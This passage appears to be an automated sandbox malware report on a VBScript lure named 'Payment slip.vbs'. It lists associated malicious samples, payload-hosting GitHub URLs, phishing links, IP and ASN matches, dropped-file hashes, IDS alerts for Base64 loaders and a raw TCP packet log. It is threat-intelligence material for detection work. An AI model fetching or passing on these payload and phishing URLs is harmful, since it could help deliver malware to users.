                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            bitbucket.org00wVZ1NU5b.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.166.143.49
                                                                                                            Set-UPl.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 185.166.143.48
                                                                                                            good.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                            • 185.166.143.48
                                                                                                            phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 185.166.143.48
                                                                                                            phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.emlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 185.166.143.50
                                                                                                            https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 185.166.143.48
                                                                                                            https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.plGet hashmaliciousScreenConnect ToolBrowse
                                                                                                            • 185.166.143.50
                                                                                                            https://nuance-pdf-professional2.software.informer.com/7.2/Get hashmaliciousUnknownBrowse
                                                                                                            • 185.166.143.50
                                                                                                            atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                            • 185.166.143.48
                                                                                                            invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                            • 185.166.143.49
                                                                                                            raw.githubusercontent.comhttp://dro.pm/axGet hashmaliciousQuasarBrowse
                                                                                                            • 185.199.109.133
                                                                                                            http://nanobotrock.comGet hashmaliciousAnonymous ProxyBrowse
                                                                                                            • 185.199.109.133
                                                                                                            http://nanobotrock.comGet hashmaliciousUnknownBrowse
                                                                                                            • 185.199.110.133
                                                                                                            http://nanobotrock.comGet hashmaliciousAnonymous ProxyBrowse
                                                                                                            • 185.199.110.133
                                                                                                            https://uniswap-interface.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 185.199.108.133
                                                                                                            astral.exeGet hashmaliciousPython StealerBrowse
                                                                                                            • 185.199.109.133
                                                                                                            crss.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.199.110.133
                                                                                                            hacn.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.199.110.133
                                                                                                            svchost.exeGet hashmaliciousHackBrowser, Blank GrabberBrowse
                                                                                                            • 185.199.109.133
                                                                                                            SolaraExecutor.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 185.199.111.133
                                                                                                            s3-w.us-east-1.amazonaws.comhttp://unpkg.comGet hashmaliciousPhisherBrowse
                                                                                                            • 52.216.93.235
                                                                                                            https:/www.google.com/url?rct=j&sa=t&url=https://www.raissa.co.tz/%3Fn%3D952769430494&ct=ga&cd=CAEYACoTODU1MjYzODc1MzI1NTg3MTY5NjIaMmFlOGY4YzcyYjNjYmNjZTpjb206ZW46VVM&usg=AOvVaw1DB1rzZoMPukIeaiRjHCiVGet hashmaliciousAnonymous ProxyBrowse
                                                                                                            • 3.5.28.132
                                                                                                            https://smt885.vip/Get hashmaliciousUnknownBrowse
                                                                                                            • 54.231.164.17
                                                                                                            https://multiresolvedevpad.firebaseapp.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 52.217.101.236
                                                                                                            https://227098-coinbase.comGet hashmaliciousUnknownBrowse
                                                                                                            • 3.5.16.110
                                                                                                            https://goo.su/V4YfzGet hashmaliciousUnknownBrowse
                                                                                                            • 3.5.20.133
                                                                                                            https://github.com/Berusol/Solara-V3/releases/tag/SetupGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 52.216.214.73
                                                                                                            FW New Voice Mail.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 3.5.0.75
                                                                                                            https://office365-com.loginprotected.com/landing/form/47677232-3f6e-4ada-9e1b-0dba51f37449Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 16.15.176.52
                                                                                                            https://rb.gy/vnpcib#Ce6S6ujW1BYFZobd?cbdQXrZMccbJNGcczVBcdcjhczcfRCMmh3mcbbbcdGet hashmaliciousUnknownBrowse
                                                                                                            • 3.5.27.129

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            DATAWAGONUSPRODUCT LIST.exeGet hashmaliciousRedLineBrowse
                                                                                                            • 104.219.234.170
                                                                                                            Zoom.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.81.130.139
                                                                                                            Zoom.exeGet hashmaliciousPureCrypter, MicroClipBrowse
                                                                                                            • 172.81.130.139
                                                                                                            Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.81.131.156
                                                                                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 104.224.1.68
                                                                                                            b39wW3jYKO.exeGet hashmaliciousStormKitty, XWormBrowse
                                                                                                            • 104.219.239.11
                                                                                                            http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzczGet hashmaliciousPhisherBrowse
                                                                                                            • 104.219.233.181
                                                                                                            https://burnlyinvestments.co.ke/images/Get hashmaliciousUnknownBrowse
                                                                                                            • 104.219.239.67
                                                                                                            YjYoFznWQI.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 104.219.239.104
                                                                                                            R.F.Q. 93-2024.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 104.219.239.104
                                                                                                            AMAZON-02UShttps://sites.google.com/view/mangotamp/accueil?authuser=1Get hashmaliciousUnknownBrowse
                                                                                                            • 13.32.99.68
                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            arc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            RFQ RFQ-BA-00090303885-xlsx.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.163.74.139
                                                                                                            Gd3lOevK672JYIK.zip.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            DHL408-23-2025.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            qxXd7JaCvGdKUp8.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            Orden Compra.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            • 76.223.113.161
                                                                                                            AMAZON-02UShttps://sites.google.com/view/mangotamp/accueil?authuser=1Get hashmaliciousUnknownBrowse
                                                                                                            • 13.32.99.68
                                                                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            arc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            RFQ RFQ-BA-00090303885-xlsx.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.163.74.139
                                                                                                            Gd3lOevK672JYIK.zip.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                                                            • 54.171.230.55
                                                                                                            DHL408-23-2025.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 18.139.62.226
                                                                                                            qxXd7JaCvGdKUp8.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.248.169.48
                                                                                                            Orden Compra.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                            • 76.223.113.161

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eDHL_Delivery_Notification_Scheduled_Package_Arrival_February_12_2025_Tracking_Information.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            seethebewtthingstodothebestwayofgreatnessgod.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            ____.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            ____.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            Ship Docs - MBLJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            Swift Copy TT USDUSD$23,401.PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            ORDER 0869786.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            Payment Receipt 0002994040595069600079000079700000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233
                                                                                                            rNewOrder_2_.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 185.166.143.48
                                                                                                            • 185.199.110.133
                                                                                                            • 52.217.123.233

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1434
                                                                                                            Entropy (8bit):5.342612360333169
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4TE4KmJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qHd
                                                                                                            MD5:DED544725C0FC4A9C1A4064260007227
                                                                                                            SHA1:C196627F0D20E14F0240201AC995E9BEBC399C29
                                                                                                            SHA-256:82F1B25C0D0DC1B72BFE5E837B668E0087D7E469CCCF909924B72FEC5C1C8F10
                                                                                                            SHA-512:41A800B36C9017CB5B9D427C9AD317ACAC680FCE5FF85391497F6BE489782423B7E22A27CD7211C2E110B5465418747841A42A16C40D1A41A0CD27D192F2A7A5
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlllul/+qll/h:NllU2el/
                                                                                                            MD5:A228F8449DB5EE3A5E620715CD8F41DF
                                                                                                            SHA1:79E774D342BD0A4261CE1F7FC6EC2734687629AC
                                                                                                            SHA-256:C495093C40C899E10AD5F5BD9298B53C090B4A5EDC2D66742BB91A9DD17F35DC
                                                                                                            SHA-512:40C9E42AE02C452BCAE13DF5BADEA1BE686109BADEDB2E533AC78E813EE39B153E0290901D70E35D840FA960777A81753B40D36E843A66E81D3EB6DB066BF75B
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:@...e................................................@..........

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhwetns.qoa.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifhs2tci.kvq.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kspgfqmt.j3b.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfvf54wc.ow5.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wghul43y.k0w.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo05oqee.gh4.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:ASCII text, with CRLF line terminators
                                                                                                            Entropy (8bit):5.4409198385350885
                                                                                                            TrID:
                                                                                                            • Visual Basic Script (13500/0) 100.00%
                                                                                                            File name:Payment slip.vbs
                                                                                                            File size:15'217 bytes
                                                                                                            MD5:7719d2cd7c8954f023992f237810dae5
                                                                                                            SHA1:3706b8094f2bdcfc9947403f4a319d2f31a0faa9
                                                                                                            SHA256:4165e5581b60355e14add9ee2ab2e1a47096dd6a6d4424494df27ec4c3ff5423
                                                                                                            SHA512:5877af790738747b10f196b4de0e5b8fcabfc2a543553514d732d7cb2afe8125ffb69e3cd930c836b34e2dab1c8d6d07ad0edb08b73e99268ecef101b257aa45
                                                                                                            SSDEEP:192:SHfJr4klq3XM7ON8C76OyQjej0/IuYerc7NF9Wu0MDxpnO/9qDozz:KLq3XM7KatQ/IuWv10MFpWqDof
                                                                                                            TLSH:606264458D559FE00D5BB57C9C87341A5600632FA438BECEED9B0EDE3AFE8141A988CD
                                                                                                            File Content Preview: 'g..nAcagbdIApF = rRegisggfgdsadffghgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSer

                                                                                                            File Icon

                                                                                                            Icon Hash:68d69b8f86ab9a86

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-02-06T11:23:11.536616+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2152.217.123.233443192.168.2.949708TCP
                                                                                                            2025-02-06T11:23:17.796987+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1185.199.110.133443192.168.2.949709TCP
                                                                                                            2025-02-06T11:23:17.796987+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1185.199.110.133443192.168.2.949709TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Feb 6, 2025 11:23:05.324666023 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:05.324695110 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:05.324754953 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:05.331569910 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:05.331585884 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:05.965346098 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:05.965435028 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:05.968344927 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:05.968358994 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:05.968712091 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:05.980101109 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:06.027327061 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.424974918 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.425009012 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.425045967 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.425069094 CET44349707185.166.143.48192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.425101995 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:06.425136089 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:06.507697105 CET49707443192.168.2.9185.166.143.48
                                                                                                            Feb 6, 2025 11:23:06.747801065 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:06.747847080 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.747927904 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:06.748248100 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:06.748253107 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.305298090 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.305363894 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.308624983 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.308630943 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.308926105 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.309922934 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.355324984 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.640825033 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.640893936 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.640912056 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.640991926 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.641025066 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.641077042 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.647186041 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.647222042 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.647268057 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.647283077 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.647296906 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.647325993 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.649873972 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.649899006 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.649935961 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.649945974 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.649961948 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.649966955 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.649991989 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.649998903 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.650010109 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.679881096 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.680003881 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.680023909 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.680068970 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.680382967 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.680406094 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.680464029 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.680562973 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.680568933 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.681166887 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.681190014 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.681225061 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.681230068 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.681248903 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.685225010 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.685254097 CET4434970852.217.123.233192.168.2.9
                                                                                                            Feb 6, 2025 11:23:07.685302019 CET49708443192.168.2.952.217.123.233
                                                                                                            Feb 6, 2025 11:23:07.685309887 CET4434970852.217.123.233192.168.2.9
